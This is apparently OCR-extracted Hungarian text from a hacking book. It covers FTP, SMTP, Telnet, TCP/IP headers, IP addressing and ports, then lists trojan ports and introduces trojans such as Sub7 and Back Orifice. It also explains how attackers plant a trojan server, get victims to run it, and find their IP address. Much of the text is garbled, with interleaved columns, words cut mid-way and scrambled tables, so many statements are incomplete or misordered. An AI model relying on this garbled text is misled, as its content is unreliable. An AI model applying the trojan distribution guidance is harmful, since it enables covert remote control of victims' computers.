átadja a teljes állomány utolsó adatait, a kliens vissza-Az átvitel végének ezeknek a fájloknak a fogadását. Most a szervergép Close bevezetése küld a kliensnek, amely veszi a parancsot, és elfogadja. 5. fázis: adateljárás mutatja a kontrolleljárásának (21. port) az átvi-Az átvitel bezárul. A kliens-adateljárás szintén terminál, a kontroli-lezárása azonban aktívan hagyja a további átvitelekhez.

iga

A paraméterként megadott könyvtárra vált. cd ~ Törli a New néven létrehozott könyvtárat. Is -l

er home-könyvtárára vált. Mkdir New

r New

ktuális könyvtárban található összes fájlt. chmod

elj

okat a fájlokhoz és/vagy könyvtárakhoz.

Az öt kommunikációs fázis az FTP-nél

rendelkezésre álló közel 60 parancsból itt csak a legfontosabk felsorolni:
indul az FTP-kapcsolat a hosthoz. open host Ha egy hosthoz még Ha már fennáll a

s

szükség, ahol lemez nélküli munkaállomásokat (diskless-workst tetnek, mert ezek nem tudják tárolni a logikai címüket. Bootolá tulajdonképpeni indítást értik, hanem csak a fontos konfiguráci telét.
SMTP

a felhasználó azonban már az FTP környezetben található, az open host , a felhasználó azonban még nincs bejelentkezve, a user paranccsal ASCII-re állítja az adatátviteli módot. binary Minden fájltranszfer után elhangzik egy Kapcsoló: ha a Kapcsoló: ha a cr be van kapcsolva (default), akkor a

elépíteni az említett kapcsolódást. user user

g. ascii

adatátviteli módot. bell

ED karakterek LINEFEED-re módosulnak. prompt

pcsolva (default), akkor több fájl átvitelénél minden fájl után egy interaktív

ezik.

A Simple Mail Transfer Protocol alighanem a legtöbbet haszn interneten. Az SMTP már a kezdet kezdetén a Unix-rendszer dett be, és időközben a normál PC-ken is megtalálta a helyét. A kezeli a mail-szoftverét, és itt készít elő egy üzenetet. Ha ezután netét, akkor ez annyi időre kerül a köztes tárba, amíg a TCP a (az OSI modell keretei között) átviszi. A kliensnek és a szervern parancs, illetve reakció áll a rendelkezésére, amelyeket most ne Helyette a szerver és a kliens közti kis párbeszédet mutatjuk be ver részéről mindig pozitív válaszból indulunk ki): • A kliens session-t épít fel a szerverhez. • A szerver megerősíti a szervizek rendelkezésre állását. • A kliens azonosítja magát. • A szerver azonosítja magát. • be. • A szerver a beleegyezését adja. • A kliens átküldi a címzettet. • A szerver válaszol: a postafiók elérhető. • A kliens inicializálja az adatátvitelt.

P-parancsok

k Transfer Protocol nem a TCP-re épül, mint az előbb tárgyalt UDP-re (User Datagram Protocol). Bár ez is adatok átvitelét m a végfelhasználó számára készült, mivel a kapcsolat biztosítatz átviteleknél nincsen jelszólekérdezés, csak a forrás-IP marad delkezésre álljon a szükséges tartomány. A legfontosabb parant, a mode, a get, a put, a verbose és a quit. néhány szó arról, hogyan is folyik itt az adatátvitel. A TFTP ens-szerver elvre épül. A kliens egy kérést küld a szervernek, az megkezdődik az adatátvitel. Minden adatrekord 512 bájtos, és a zza. A kliens akkor tételezi fel automatikusan az átvitel végét, ha rd 512 bájtnál rövidebb.

A kliens átadja a tulajdoképpeni parancsot, amely mail-k

• A szerver felveszi az adatokat, és a befejezéshez kéri a <crlf> csot.

• A kliens az átvitel befejezése után, ahogy megállapod <crlf><crlf> -et. • A kliens a megfelelő paranccsal befejezi a kapcsolatot. • A szerver erre service closing-gal felel.

ocol is az UDP-re (Use Datagram Protocol) épül, és tulajdonképpen ztették, hogy boot-folyamatokat aktiváljon. Erre csak ott van

Ha egyszer még elő az adatátvitelben. amely a szervertől kap adatokat. a címzett ennek megfelelő üzenetet küld újrakéri az érintett csomagot. • Ellenőrzés. A transzport rétegben két protokoll található. amelyben azokat elkü dául minden elküldött csomaghoz egy numerikus értéket generá téknek a segítségével a két egymással összeköttetésben álló szám csomagot azonosít. hibafelismerés és folyamatvezérlés a kapcsolat a rocedure Calls-t akkor használják. domain a NIS-adatbázisban leképezett számítógépek csoportja. így nayes konvertereket kellett alkalmazni. . am egyidejű átvitelére lehet használni. • Lehetővé tenni az adatátvitelt dedikált transzportkapcsolato Multiplexing: egy kommunikációs csatorna felépítése. kompatibilitási ek fel. • Az adatfolyamok priorizálása. amely nagyon nagy ásokat igényelne. hanem a legkülönbözőbb adattípusoka. Az RPC-vel a részfeladatokat specifikusan az kvalifikált számítógéphez lehet rendelni. egy multikomputerré olvadnak össze. hogy a fogadott adatok állapotban és sorrendben érkezzenek meg. vagyis az adatfolyam prioritá küldése. ha több különböző kapacitású szádelkezésre. Ez a rendszer. a már említ UDP (User Datagram Protocol). Transmission Control Protocol (TCP) Information Services műveletek biztonsági objektumok és elérési re szolgálnak. Az átmenetekkel nem volt könnyű megbirkózni. • Optimalizált adatfolyam . és a protokoll-család más tagj valamennyi adat megbízható átvitelét garantálja. A pontosabb felépítésébe itt nem megyünk bele. gondoskodva arról. elszavak központi adminisztrációját. A címzett minden fogadott csomagról egy ü feladónak. is át lehet küldeni vele. audió stb. Ez az eljárás egyébként yre nagyobb figyelmet vívott ki magának a nagyvállalatoknál és a nél. amelyet eredetileg a SUN fejleszYellow Pages volt a neve). így a különböző számítótni. lehetővé teszi a decentralizált userID-k. és olyan feladatot kell elvégezni. de nem változtatni ezeket. A NIS működtetéséhez a ponensekre van szükség: A TCP a következőkre képes: • Adatfolyam-átvitel • Virtuális full-duplex kapcsolatok • Adatfolyam-vezérlés • Hibafelismerés • Prioritásvezérlés atbázis egy túlméretezett /etc/passwd-fájlt jelenít meg a hálózat ster-Server a megfelelő domainekkel kezeli a NIS-adatbázist. ent egy számítógép. Ebben a hibael funkciói segítenek. 1992 óta nagyjából csak a purpose Internet Mail Extensions) használják.Windowing-nak is nevezik. s ez igazolja az átvitel tökéletességét. amely már nem ak a tiszta szövegküldésre. Transzport réteg A transzport rétegnek a következő feladatokat kell ellátnia: • A kapcsolatokat ellenőrzötten kell felépíteni és bezárni.as években más mail-rendszereket is bevezettek. A TCP az egyik fő protokoll. ve-Server az adatbázis egy biztonsági másolatát tartalmazza a erver kiesésének az esetére.

Hogy ezt elkerüljék. amelyről később. 53 161 SNMP 69 TFTP 25 SMTP 32 FTP 23 80 Protoco Header Checksum Source Address Destination Address Options Padding Data C DNS TELNET HTTP agram Protocol (UDP) Transmission Control Protocol (TCP) z UDP/TCP Version: az IP-verziót jelöli. az adatok hosszáról. Type of Service: minden bitnek csak ajánlókaraktere van. mint azok a protokollok. hogy egy adatcsomag legfeljebb 65535 bájt méretű csomag ennél nagyobb. nszportréteg alatti rétegek tartalmaznak. Ezt nevezik p lásnak (Buffer Owerflow). illetve a TCP-vel. Ugyanúgy biztosítatlan. Az Internet Protocol egy headerből és az azt követő adatblok többek között az adatcsomagok fragmentálásáért is felelős. hogy nem lépett-e fel súlyos hiba az adatátvitelben. az lefagyaszthatja a PC-t. azonban közeledik a váltás a 6. amely a TCP-nél említett tulajdonságok dicsekedhet. Az interneten pillanatnyilag m használják. Ezt a bonyolult folyamatot megpróbáljuk egy header-mode megmagyarázni: Version Flags | HL Type of Service Fragment Offset TTL gram Protocol (UDP) Totál Length Indent ztosítatlan protokoll. hogy a TCP teljes felel a hírének. ot egy három részből álló folyamat vezeti be. a DoS-támadásokró ben többet mondunk. amelyet three-wayneveznek. Az UDP azonban nem kéri a fogadás megerősítehát. Az UDP ezt a. és közli a UDP-header adatainak az t. IHL vagy HL (Internet Header Length): az IP-header hossza kokban van megadva. hogy milyen szolgáltatások érP-vel. amiért az UDP li réteghez tartozik: az IP ugyan elő tud állítani kapcsolatokat. mondhatni. amellyel a távoli számítógéphez. 64 K Identification: egy adatcsomag egyértelmű ismertetőjele. egy alkalmazáscsatoló-felület az IP-hez. A roppant rövidre fogott: információkat tartalmaz a kiinduló rtról. Hálózati réteg Ez a réteg különböző protokollokat fog össze.s felügyeli. kis táblázat példákat mutat arra. illetve a szerverhez olódni. Ebből látszik. A elküldött csomagokat a célrendszerben újból egyesítik reassembly néven ismertebb. megerősítéssel és egy várakozási listával (a kapcsolathoz) válaszol. miszerint biztonságos átviteli protokoll. Ezek és a két következő mező vezérlik a reassembly-t (ld . amelyek aktíva az adatok átvitelében. ha a célszámítógép egy bizonyos idő megerősítést a fogadásukról. tud adatokat továbbítani az alkalmazásoknak. mint például az Internet Explorer. a TCP-re bízhatja a kapét. megerősítéssel válaszol. A Pre séget nyújt a vezérlőinformációk előnyben részesítésére. azás. verzióra. etben automatikusan megszakítja a kapcsolatot a másik számítólten átküldi az adatokat. amelyet néh zatban (LAN) már használnak. Az Internet Protocol felelős az adatcsomagok átviteléért a mennyi protokolljánál. A f azt jelenti. ehhez persze még más fontos protokollokra is szükség van. En és a Source Address-nek a segítségével ismerhető fel a töredékad zósága. Totál Lenght: az adatcsomag teljes hossza bájtban (max. megnyitása után mindkét irányba áramolhatnak az adatok. mint a TCP. például: Internet Protocol (IP) ő számítógép. a csomagot részcso bolják. illetve a kliens elküldi a kapcsolatra irányuló ké egy portot. és a kapcsolat felépül. Az ok.

Ahelyett. A felesleges késleltetések elkerülése érdekében a header ela korlátozódik. és kiosztja a fragAz első fragmentum offset O-t kap. Ez egy headerből és az ARP-csomagból áll. címből állítaná elő a fizikait. amely tartalmazza Ezt a módszert tulajdonképpen csak olyan számítógépeknél ha lyeknek nincs olyan adathordozójuk. amelyben tartós. hogy hiányoznak-e töredékek. Mivel a TTL-érték (Time tleg a flag és a flag offset értékei is minden routernél változnak. amelyek nem támogatják a álást. Address: a célállomás internetcíme. Mivel az időmérés meglematikus a hálózatban. Ezáltal teljesül a 1 6 bites ás. és tartalmaz adatokat a logikai forrás-protokollcímhez és a fizikai címhez is. Mivel a különböző protokollok az IP-re támaszkodnak. Itt van feljegyezve a küldő száme. A padding feladata. a firmware á niált fizikai címe. A legfontosabbak: • Record Route: naplózza az adatcsomag útját. Routolási hibánál. Ennek az értéknek a dja a címzett megállapítani. és egy RARP-választ küldenek vissza. a host egy RARP-kérést küld a f amire azután a RARP-szerverek a hálózatban átnézik a saját refe taikat. • gments: hogy kiderüljön. mivel semmilyen módon nem áll összeköttetés hardvercímével. meg kell delt ULP (Upper Layer Protocol) protokollt. Reverse Address Resolution Protocol (RARP) ecksum: az IP-header ellenőrzőszáma. minden továbbinál egy fragmezőjének a hosszával növekszik az érték. az internetprotokoll igazán komplex. amelyet például az interneten talál meghajtó egymagában nem képes arra. hogy bináris null re egészítse ki a frame-et. Tehát a logikai címet a fizikai címre kell cserél az ARP. Options: opcionális mező további információknak. Offset: egy adatcsomag adatbájtjait számozza. A RARP az ARP-vel ellenkező irányban működik. és a headerben nincs feljegyezve indulási uter úgy dekrementálja (kicsinyíti) a csomagot átfutáskor. A fontos ULP-k: Leírás ICMP (Internet Control Message Protocol) 3 TCP EGP UDP (User Loose Source Routing: a küldőállomás előír néhány közb • Strict Source Routing: a küldőállomás minden közbeeső állo • Timestamp Option: az IP-címe helyett. Itt van feljegyezve a fogadó címe. és ezért mindig csak a fizikai cím ismeretével bootolnak . hogy a logikai címén számítógépet. Ekkor a következő router már nem veszi fel. ress: a forrásállomás internetcíme. lően kell alakítani az ellenőrzőszámot. hogy egy adatcsomag minden umát fogadta-e. az lamikor el lesz távolítva a hálózatról. például huroknál. A számítógépes kommunikációhoz azonban n nem logikai címet használnak.bitnek a következő a jelentése: gment: olyan hostokhoz. Address Resolution Protocol (ARP) -to-Gateway Protocol) 6 Control Protocol) 8 col) ay Protocol) 17 P-k Egy hálózatban minden számítógépnek van egy. hogy tékre csökkenjen. Mint látjuk. e (TTL): Minden csomagnak van egy előre megadott maximális mit itt lehet megadni. Az opciók mindenekelőtt a hálózati bakeresést és a méréseket szolgálják. Sok kódot kiegészítésekhez terveztek. de mindez az adatok átvitelét szolgálja. logikai c tárolni. • Padding: kitöltő bitek. akárcsak a record r den gateway a feldolgozás időpontját jegyzi be.

a Telnet elindul. amelyeket az ICMP küld: eírás estination unreachable: a célállomás nem érhető el. 2. 11 Time exceeded: a timer puffer-erőforrások elhasználva. mindkét irányra kiterjedő. Windows 95/98 (és magasabb verzió) alatt kattintsunk a Sta mire megjelenik egy kis párbeszédablak. Ez ugyanaz a folya FTP-nél. hogy távoli s jelentkezzenek be az interneten. és készen áll. http://www. 4. és az adatok visszajönnek a számítógépre. Most a szerver a jelszót akarja tudni. azonban kotórésze. Beírjuk a következőket: • Hostnév: meine-domain. Ez az a név. ehhez a Telnet egy terminált szimulál (szöveg. 11. ány alkalmazás és protokoll használata és ztonságosságuk 9.1 A Telnet aüzenetekről. az internetfejles kafeljegyzése. 12. eírás cho reply 8 Time est 16 17 6.ontrol Message Protocol (ICMP) eladata az üzenetek. Adjuk meg a login-nevünket.ietf. amelyet az FTPlunk (ld.3.org/) a következőképpen defini protokoll célja egy általános. Ezután nyomjuk le az Enter-t. Kattintsunk az OK-ra. Megjelenik egy pá 7. a szerver üdvözöl. .de uest 18 ly iós üzeneteinek a listája • Csatlakozás: telnet • terminál típus: vt 100 8. 5. mintha maga is egy fölérendelt protokoll lenne. 3. 5 Paraméter Problem: Paraméter-probléma. 10. protokolloknak a használata és a lehetséges biztonságosságuk telei a hackerek cselekményeinek. például a hibaüzenetek közvetítése. 8 bit/bájt-orie kációs lehetőséget nyújtani. lejjebb). 3. Kattintsunk a Kapcsolatra. Kattintsunk a Hálózati rendszer kapcsolatra. Most megjelenik: Welcome. A Telnetet az RFC 854 (Request for Comment. Gépeljük be a telnet. 4 -elterelés. A szokásos módon tárcsázzunk be a szolgáltatónkhoz. n megfelelően módosul. a Telneten keresztül programokat is el lehet rendszereken.exe sort. Ugyanaz IP-t. A Telnet tehát lehetővé teszi a felhasználóknak. Váltsunk vissza a Telnet-re. Sőt. és parancsokat hajtassanak végre mítógépeken. A fő cél egy szabványos módszer létrehozás keken alapuló folyamatok összekötésére. gra Windows alatt egy Telnet-kapcsolat a következők szerint épü eteinek listája az információs üzenetekről: 1.

Az A fontos szolgáltatás az interneten. tehát akárhányszor m a jelszót. jelszó). és jelszóként egy e-mail-címet k zel az FTP-szerver nyilvános részéhez kapunk hozzáférést. Az Anonymus FTP-nél bárki bejelentkezhet a sze névként többnyire Anonymus-t. a szerek fájlrendszerei közötti strukturális különbségekből adódó vesződolása és 4. Mivel a Telnet felhasználóazonosítást kíván (loginnév. b3$ stb. adatátvitel egy FTP kliensen keresztül történik. mert általa a programok vagy a d minden internet-felhasználó számára elérhetők. illetve FTP da futnia a célszámítógépen. A kliens egy kérdést küld a távoli számítógép FTP Ezt a kérdést a 21. hogy minden adatot kódolatlan szövegként visz át. egy betolakodó. 3. FTP ávoli rendszerek közötti adatátvitel egyik módszere. Az FTP-t az for Comments. Az FTP-nek két fajtája van: a User-FTP és az Anonymus-FTP nél a felhasználónak a login-nevével és a jelszavával kel bejentkeznie. biztonsági kézikönyv) így mutatja be: Az FTP fel(programok és/vagy adatok) közhaszmú átvitele. amiért nem látjuk. ubis2$. A CuteFTP felülete e még egyszer az Enter-t. . A parancssort lehet látni. akkor a szerver hibakóddal válaszol. Ha valak login-nevet ad meg. pl. Jelszótámadások Az FTP igen alkalmas a jelszavak kipróbálására. a jelszó beírása ható. Ezt a támadást Brute Force-rohamnak is nevezik. Az FTP biztonsága Az FTP nem túl biztonságos protokoll. 2. elsősorban programokon keresztüli hasznáék. szervereknél ki lehet találni az érvényes login-neveket. porton keresztül teszi fel. távoli számítógépek mplicit (programokon keresztüli) használatának az elősegítése. adatok megbízható és hatékony átvitele. nagyon könnyen megszerezheti a fiókadatokat. amit írunk. ilyen például a y a WS_FTP. Egy kapcsolat létrehozásához. lehet írni a parancsokat. Felépül a Telnet-kapcsolat A Telnettel az az egy gond van. mivel a szabvá cióban nincs korlátozás a jelszavak beírására. s különbözőképpen tá a legfontosabb támadási formák. ha beleolvas a omba.rtassuk magunkat. Bár az FTP-t egy vetlenül is lehet használni. pcsolatban vagyunk a szerverrel. FTP-szervernek.

A legnagyobb veszélyt azonban maguk ve a szerverprogramok jelentik. szervertől függően (IRC szerver. a trójaiaknál). felhasználók.net). irc. A beszélgetésekhez ma már kliens valamelyikét használják.4 Az IP-címzés IRC ternet Relay Chat) az e-mail mellett az egyik legkedveltebb szolerneten. amelyeket a chat-en mondott nekik ajtsanak. Az IP-címek archikus. hogy egy ügyfél a szolgáltatójától kapja ges IP-címet. Az interneten rás egy egyértelmű számmal.net/) felelős az IP-címek kiosz Hogyan néz ki egy IP-cím? A jelenleg használt IP-protokoll az IPv4.3. íg szegmenssel elméletileg több mint négymilliárd (pontosan: 4 29 met lehet kezelni. az IP-címmel érhető el. Többrésztvevős valós idejű konferenciákat tesz lehetővé. A rosszul konfigurált kliensprog több elérést engednek meg a szervereknek a helyi erőforrásokra mint amennyi tanácsos volna. az IP Numbering Autho pában a RIPE (http://www. IRC-felület A címzés az interneten az IP-címzésen alapul. a bb csatornákon (channels) lehetnek. amelynél a 32 bit 8 bitekre van felosztva. pl. eltöltés jelszófájlt. amelyek a segítségére lehetnek a további támadás veszélyt jelenthet a fájlcsere is.ripe. . ami azt jelenti. mális számként írják le. ha egy betörő lózati forgalmakba. A legismertebbek közé tartoznak hC és a pIRCh. Egy módon manipulált szoftvert helyezhet el a szerveren (vírus. miközben a hálózatok üzemeltetői időbeli kül. Minden IP-cím 32 vel az ilyen számkombinációk igen körülményesek. Eszerint egy IP-cím négy bájtból áll: 11000010 194 Pl: 11000010 128 1 1 1 0 0 0 1 01001101 77 64 01111100 124 16 32 8 4 álóan alkalmas a Social Engineering-re. De az IRC-parancsokból is sok információt tudhat me felhasználóról.euirc. többnyire a p írásmódot használják. felhasználói adatok birtokába juthat. erverre lehet Anonymus-belépéssel szoftvert feltölteni (upload). trójai). blokkokban kölcsönzik IP-címeiket. Egy támadó elküldetheti például e-mailben magának a Minden kvadráns egy 0 és 255 közti számot reprezentál.ffing TP kódolatlan szövegként továbbítja az adatokat. Leginkább az újoncok vehogy bizonyos parancsokat. ahol mindig szívesen küldenek t rusokat (ld. Erről a óló fejezetben további részleteket tudhatnak meg. a szolgáltató megintcsak a hálózattól kölcsönz amelyre csatlakozik. 3.

amelyben egy IP-cím a mostani 32 bit helyett 12 yú hálózatok Foglalt IP-címek -címek van.x. a 255 a negyed 127. TCP/IP viss Ez az A-osztályú há hurokként szolgál. az Ipv6 IP-címzési rendszer. A C- címek kiadása.168. a 0 a subnet megnevezésé alatt a negyedik negyedben minden gépet értünk 1 -254-ig). Így jöttek létre a hálózati osza.168.x. amely a további szövegek jobb megértésé A port egy csatolófelület. negyed értékek 224-239-ig a multicast-címe -191-ig vannak értékek. TCP/IP-installációk tesztelésére szolgálnak a számítógépe pinggel egy tetszőleges 127-es címre). 224.x. 10.bbb.x) negyedikről szabadon rendelkezhetnek (ez kiszámolva 256 különböző meghatározott hálózatot sem definiálnak és több cím biztosítják az adatcsomagok egyidejű átvitelét. mivel a szabad számkészlet mindig kisebb lesz.x. belüli IP-címeket csak az intraneten b Az 1. az egyes IP-címterek kezelését nemzeti NIC-eknek és knak adta át. szegmens észen kiosztva kapják. aaa.x.31.bbb.x.ti osztályok kiderült.255-ig routolni.x. amelynek ez az első szegmense.4 Aportokról Ebben a könyvben gyakran találkozunk a port fogalmával.0 és x.ccc. hogy négymilliárd IP-címet nagyon nehezen tud egyetkezelni.x.x A B-osztályú hálózatok első net helyi gépei számára van fennt k ki.x. amelyet a szolgáltatók nem oszthatnak ki. 172. A B-osztályú hálózatok tulajdonosai a két első negyedet 65536 különböző IP-címet jelent egy B-osztályú hálózaton belül). internetre kapcsolódó intra-00192. Már ma is szűkösen megy a B. Ezeket időnként D-osztálynak i A jövőbeli fejlesztésekhez zárolva vannak még az 1.x). az InterNIC-től függetlenül.x. amelyre információk tudnak bejön menni.x-ig hálózaton belüli IP-címeket csak az intraneten belül lehet routolni.x. és a maradék 16 bitet adhatják ki maguk (ez 254-ig.x internetre kapcsolódó intranet helyi gépei számára van fenntartva.x-ig 240. önállóan a hozzájuk utalt címtartományokat. így a négymilliárd elméletileg rendelkezésre álló IP-c már csak egy „töredéke" marad. és a második negyedben van a 0-255-ig ékterület.x239. C-osztályú hálózatokon 255. gfelelően a négymilliárd IP-címet ismét három osztályba sorolés C-osztályú hálózatokba.x gépei számára van fenntartva.x.bbb. ntesítés céljából az InterNIC.x255.x.255 Leírás Minden IP-címben a negyedik szegmensben a 0 és 255 érték szertől függően zárolva vannak. egyetlen x. Leírás Az A-osztályú hálózatok az első negyedben 1 és 126 közötti értékeket A-osztályú hálózatok tulajdonosai az InterNIC-től (ami most is minden A- Címek x. amelyek. Az A-osztályú hálózatokat azonban mára már mind kiosztották. Néhány ilyen csatolófelületet biztosan minden felhasznál . Ezen az B-osztályú hálózat ugyancsak egy internetre kapcsolódó intranet 172.x-i intraneten belül lehet routolni.x.oszt m kvadránsban megint a teljes értékterület tartozik 0-255-ig. Ezért van be állni. A C-osztályú hálózatok első negyedében 192-223-ig vannak értékek.x.xx broadcast-címként szolgál (ezzel az értékkel érhető el egy subnet minden sz Minden IP-cím. amely a 90-es évek elején átvette az elését. ezér magyarázat következik. és tok tulajdonosainak az első három szegmenst (aaa. és az IP-cím fennmaradó 24 bitjét at létesíteni az interneten.16.és C. E B-osztályú hálózatokon belüli IP-címeket cs Ez a 256 C-osztályú hálózat u ot kezel) kapják az első negyedet. 192.x. x.x. mert más célokat 3. amelyekben csak az első negyedet határozza meg egy ék háromnegyedet szabadon lehet kiadni.x.

iana. Ezek a közkedvelt szervizeknek vannak fennzerint csak az arra jogosult felhasználók érhetik el őket.ilyen például a 7tf Sphere (www. és gyakran bizonyos szervizekhez vezve. A mail-szolgáltatás ennek megfelelőwn portok szabványa szerint. és az portok lezárása egy tűzfallal. s a megfelelő szolgramhibáira építenek. A nagyobb portokat dinamikus vagy privát portoknak nevezik. errendszer szintén különféle portokat kínál az interneta különböző szolgáltatásokhoz. után a monitor vagy a nyomtató jelenti. Ezeket a portokat számokkal jelölik. például hogy vannak-e mail-jei) 80 POP3 (Post Office Protocol 3). illetve rossz szándékú támadások agy fogadhatók. ez a port tehát nyitott. de rendszerint mindenki használhatja őket. Megfelelő védőmechanizmusok nélkül az ilyen bnyire a számítógép lefagyásához vezetnek.hackerzbook. A minollok megfelelő porthoz rendelésével kapcsolatos információkat teg tartalmazza. nem pr Domain Name Server (DNS nev Finger SMTP (mailküldéshez. ha egy program ezen a porton egy kérésre (request). ezeket más aját készítésűek is. itt kérjük le a Netbios Name Service (hálózati PC-k nevei) 138 Netbios Datagramm Service (Adatforgalom a hálózatban) 139 Session Service (a nukerek is ezt használják) Netb A legfontosabb portok áttekintése Valamennyi port listája a http://www. számú portjával. hanem erportokról van szó. kié egy weboldal) 53 kereséséhez) 66 (World Wide Web) 110 jeinket 137 (információk egy felhasználóról. E-maileket például a Simple Mail Transfer TP)-on keresztül küldünk. illetve statikus Well known portok. Ez a port bocsátja rendelkezésre a Webhez szükséges HTTP kommunikációs protokollt. kkor nyitott. . ok/ról/on káros adatcsomagok. désre vár.ik például az egér és a billentyűzet mint adatbeviteli eszközök. Egy portszkennelés eredménye A következő táblázat néhány fontos portot ír le: Port 21 25 Leírás FTP (File Transfer Protocol) 23 Telnet (Service. Az 1-1023-ig portok a standard. így pélő egy weboldal letöltésekor automatikusan kapcsolatot létesít a rver 80. t portok az 1024-49151 portok. Portjai minden olyan operációs rendszernek ly támogatja a TCP/IP-t.org/assignments/ numbers weboldalon található. A manipulált adatdéséhez általában adott portokat használnak. Simple Mail Transfer Protocol) 43 SQL * Net (SQL Server Port) 79 (utánanézni. akkor ez porton vár kérdésre. használhatják. Ezért ajánlatos a rendszer gyakori vizsgálata egy el . a 25. portszámról megy. a Unixnak és a BeOs-nak is. Itt azonban nem fizikai. 5536 port van.de) -. Ha egy FTP szervert telepítünk a rendszerre. tehát vannak a Linuxnak. ortok komoly biztonsági hiányosságokat is jelentenek a rendszen a portokon keresztül az avatott hackerek be tudnak törni az szerbe.

ezért most felsoroljuk a legismertebb trójaiak legfontosabb portjait.A portokat a trójaiak is használják.de címen kapunk pontos listát. Port 2140 Throat 30129 Paradise 5400 12361 12345 Netbus 2 Pro 21544 Régi Back Orifice (BO) 1243 Régi Sub 7 27374 30100 Hackers Paradise Sub7 Netsphere 456 Trójai Deep Throat 6670 Deep Masters Blade Runner Whack A Mole 20034 Girlfriend Netbus 31337 Deep Throat 6771 A trójai portok Az összes ismert trójai portról a http://www.un. .secure.

1 A trójaiakat fájlokba integrálják 4. fejezet .egy trójai rémisztő lehetőségekkel 4. Miből 4.3 Windows-Registry ez már izgalmas 4.4 Módszerek az Explorer.6.exe kicserélése áll egy trójai? .és trójai-szkenner 4.4 4.6 Sub7 .3.6.3 Hogyan szerzik meg a hackerek az IP-t? 4.5 A runonce.6.1 4.1 Támad a Sub7 BackOrifice 2K .5 4.5.6.1 A szerver kiosztása 4.3 Így álcázzák és terjesztik a trójaiakat 4.1 A BO2K és összetevői Így ismerjük fel a trójait a rendszerünkben 4.4.3.2 Álcázás a WinZip-pel 4.3.6.1 Vírus.3.4 Elég egy CD és az automatikus lejátszás funkció 4.3.3.2.5 A lemezek majdnem ugyanígy működnek 4.exe-vel a C:\ meghajtóra 4.3 A trójaiakat az ICQ-val is tovább lehet adni 4.Tartalom 4.7 Mit csinálnak a hobby-hackerek a trójaiakkal? 4. és vezérli a szervert 4.4.2 A kliens otthon marad.2.Hálózati eszköz vagy támadás a Microsoft ellen 4.2 AutoRun bejegyzések 4.6 További terjesztési stratégiák 4.3.2.2 A történelmi minta.

Ez a tipikus feladata egy keylogger-nek. 4. Azonban a trójai és a származási helye között minden esetben kapcsolatnak kell lennie. azaz „rá kell sózni". ha a fertőzött számítógépet az IP-címén keresztül sikerül megszólítania. telepíteni kell a szervert a cél-.mint program aktív. amelyről azt sem tudjuk. álcázást használ. hanem a számítógép távirányítását is lehetővé teszik. A szerver a központi program. a görög Odüsszeusznak támadt egy ötlete. mégis mérhetetlen károkat okozhat. Még egy kicsit világosabban leírva: a trójai egy meg nem engedett kód egy legitim programon belül . amelyekről a fertőzött rendszer felhasználója mit sem tud.ilyenkor a program a trójai program hordozója- . hogy a számítógépünkre került. Trója elesett . amely információkat közvetít úgy. Az elérés csak akkor jöhet létre. Hogy a trójai eltitkolja az elhelyezését. Jóval komplexebbek azok a programok. A trójaiak a biztos győzelem tudatában bevontatták a lovat a városba. * A felhasználót rá kell venni arra. Trójainak tehát egy szoftvert nevezünk. és Trója kapuja elé állíttatta. A hackernek meg kell kapnia a fertőzött PC aktuális IP-címét. amely egy fájlba naplózza felhasználói beviteleket. a trójaiak isteni jelképét. hogy egy számítógép vagy annak az adatai elérhetővé váljanak. Erre a görögök évekig ostromolták eredménytelenül Trója városát. amelybe meg nem engedett kódot ágyaztak . A trójai lehet egy hasznos program. az kiderül a továbbiakban a különböző trójai programok leírásából. De lehet egy olyan program is.1 A történelmi minta Bizonyára mindenki ismeri a homéroszi történetet: Párizs. De a ló belseje a legerősebb és legbátrabb görög harcosokat rejtette.2 Miből áll egy trójai? Először is tudni kell. Az RFC 1244 (Site Security Handbook) így írja le a trójait (a szerző fordítása): Trójai lehet egy program. Itt mutatkozik meg a trójaiak és a klasszikus távkarbantartó programok hasonlósága. amely valami hasznosat vagy csak valami érdekeset csinál. vagyis egy keyboard logfájlt készít. ként működik. hogy a bevitt adatokat egy előre megadott e-mail-címre küldi a következő online-kapcsolatnál. például a tudtunk nélkül jelszavakat lop vagy fájlokat másol. amely látszólag hasznos funkciókat hajt végre. amelyekről a fertőzött rendszer felhasználójának nincsen tudomása. hogy később egy klienssel célzottan érhesse el a kitelepített szervereket. Ezután a görögök visszahúzódtak. és kinyitották a város kapuit a görög seregnek. amely a város közelében rejtőzött. Mindig valami váratlant tesz. Hogy az akciók lehetőségei milyenek lehetnek. amelyek nemcsak adatokat küldenek el. A hacker ilyenkor többnyire a következő problémákkal szembesül: • A szervert el kell juttatni a felhasználóhoz. Amikor látták. Ez a kapcsolat manapság legegyszerűbben az interneten vagy egy hálózaton keresztül valósítható meg. Úgy képzelhető el.2. hogy ostrommal nem tudják bevenni.a hackerek pedig a magukévá tették a trójai faló ötletét. Csak akkor lehet egy (internetes vagy hálózati) kapcsolaton keresztül az IP-cím segítségével az idegen számítógépet elérni.A trójaiak 4. a trójai király megszöktette a szépséges görög Helénát. de az engedélyezetlen kódja alapján olyan funkciókat is elvégez. ha a szerver . Különböző műveleteket hajt végre.1 A szerver kiosztása Ahhoz. hogy a hacker megpróbálja elhelyezni vagyis „szórni" a szervert a célrendszereken. és önfeledten ünnepeltek. hogy el is indítsa a szervert. illetve áldozat PC-re.tehát az eredeti program megváltoztatása. 4. amelyek távoli számítógépek hálózaton vagy telefonvonalon keresztüli kezelését teszik lehetővé. amely lehetővé teszi az idegen számítógép „távirányítását". A legegyszerűbb formájában a trójai egyszerűen egy kémprogram lehet. Építtetett egy hatalmas falovat. hogy miből is áll egy trójai. akárcsak a görög katonák. akik azután éjszaka kimásztak a ló hasából.

amellyel meghatározott IP-tartományokat lehet tapogatni. Ha a szerver automatikus értesítésre van beállítva. Ezután igen könnyű kiolvasni remote címekből a trójai szerver IP-jét.0 programkódjában. amelyeket a kliens el tud indítani. A komplex trójai programok. hogy a fertőzött számítógép egyáltalán online-ban van-e.2 A kliens otthon marad. A kapcsolat könnyen felismerhető 4. illetve az internetre lép.2. és megkapja a támadáshoz szükséges IP-címet. Ez az eset is mutatja. hogy maga a hacker is online legyen a megfelelő időben. amelyen a SÁTÁN 1. Már csak az kell. és ott beírjuk: netstat . zel a kliens az idegen számítógép irányítócentruma lesz. hogy a hackerek nem csak az ismert módokat.3 Hogyan szerzik meg a hackerek az IP-t? A trójai használatához tehát szükség van a fertőzött számítógép IP-jére.n. módosította a main()-funkcókat. ha mondjuk átvitel közben IRC-n vagy ICQ-n keresztül. de nem leéli feltétlenül annak lennie. Ezzel a programmal tud akciókat kiváltani a szerverrel a számítógépek között 